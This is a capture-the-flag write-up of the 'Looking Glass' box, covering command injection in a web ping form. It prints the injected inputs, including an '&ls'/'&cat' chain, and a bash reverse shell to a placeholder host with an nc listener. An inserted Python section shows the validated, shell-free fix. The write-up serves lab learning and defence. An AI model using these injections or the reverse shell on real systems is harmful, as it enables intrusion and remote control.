Looking Glass

Aneesh Verma
Aug 31, 2022
OWASP Top 10

Getting back into pwning boxes. Starting with an easy track of OWASP Top 10.

The first box is Looking Glass, which is listed as easy.

The IPs might be different in different pics as I got lazy solving it in one go.

I open the IP and see the source code but nothing interesting.

As routine, I use masscan to find ports and then use nmap to find details on them in the background.

Vulnerability

However, when I saw what the webpage was doing, I asked myself, can it be that easy?
The vulnerability seemed to be Command Injection, since a command was being executed on the server and we could input an IP.
I opened Burp and intercepted the Ping request and the Traceroute request.
In the Ping request, I quickly tested for Command Injection:

And I got the result:

Vulnerability confirmed. It is Command Injection.

Exploitation

Exploitation was a little annoying.

Ping

First, I tried pinging from the server to our machine just by:
ping x.x.x.x (my IP).

I would monitor that using tcpdump:
sudo tcpdump icmp -i wlan0

However, I got no data on tcpdump and there was 100% packet loss in response.

Then, I tried chaining another ping, but that didn’t work either:
206.189.125.80&ping x.x.x.x
I got a Gateway Timeout Error.

Reverse Shell

I was like, I will try a reverse shell anyhow, even if the chances were low since ping didn’t work.

I set my netcat:
nc -lvnp 4004

Then passed the following input to the request:

206.189.125.80&bash -i >& /dev/tcp/x.x.x.x/4004 0>&1

However, I got nothing in response.

List (ls)

I was getting irritated, so I thought, I will just brute force this. I gave “ls” in the input:
206.189.125.80&ls

And I got index.php in response. I knew it’s a wrap now.

The flag is usually in the root dir, therefore the input now looked like:
206.189.125.80&ls ../

In response, I saw “flag_gHuE1” file. Naturally, I opened the file using “cat”:
206.189.125.80&cat flag_gHuE1

And congratulations, the flag is here.
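The defensive side of this bug, as an added example that is not part of the original write-up or the box's own code: the submitted value is parsed as an IP literal and handed to ping as an argument vector, so no shell ever interprets it. The function names and the Linux `ping -c` flag are assumptions; the sample inputs are the ones quoted in this write-up plus one constructed edge case.

```python
import ipaddress
import subprocess


def parse_target(user_input: str) -> str:
    """Return the canonical IP string, or raise ValueError."""
    # ip_address() accepts only an IPv4/IPv6 literal, so '&', ';', '|',
    # spaces and anything after them make parsing fail.
    addr = ipaddress.ip_address(user_input.strip())
    # Edge case: Python 3.9+ accepts an IPv6 zone id after '%' with almost
    # no character checks (e.g. 'fe80::1%;ls'), so refuse zone ids outright.
    if getattr(addr, "scope_id", None):
        raise ValueError("IPv6 zone identifiers are not accepted")
    return str(addr)


def build_ping_argv(user_input: str) -> list:
    """Build the argument vector; the address is one argv element."""
    return ["ping", "-c", "4", parse_target(user_input)]


def run_ping(user_input: str) -> str:
    """Run ping without a shell (hypothetical handler for the web form)."""
    argv = build_ping_argv(user_input)
    # No shell=True: the list goes straight to exec, nothing is re-parsed.
    done = subprocess.run(argv, capture_output=True, text=True,
                          timeout=15, check=False)
    return done.stdout


def rejected(inputs):
    """Return the inputs that fail validation."""
    bad = []
    for value in inputs:
        try:
            parse_target(value)
        except ValueError:
            bad.append(value)
    return bad


# Inputs quoted from the write-up, plus one constructed zone-id case.
SAMPLE_INPUTS = ["206.189.125.80&ls", "206.189.125.80&ls ../",
                 "206.189.125.80&cat flag_gHuE1", "fe80::1%;ls"]

if __name__ == "__main__":
    print("rejected:", rejected(SAMPLE_INPUTS))
    print("argv for a plain address:", build_ping_argv("206.189.125.80"))
```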

Overall, an easy box but I had fun :)

Looking forward to pwning more easy boxes, getting some good foundation again, and then going for medium boxes again.
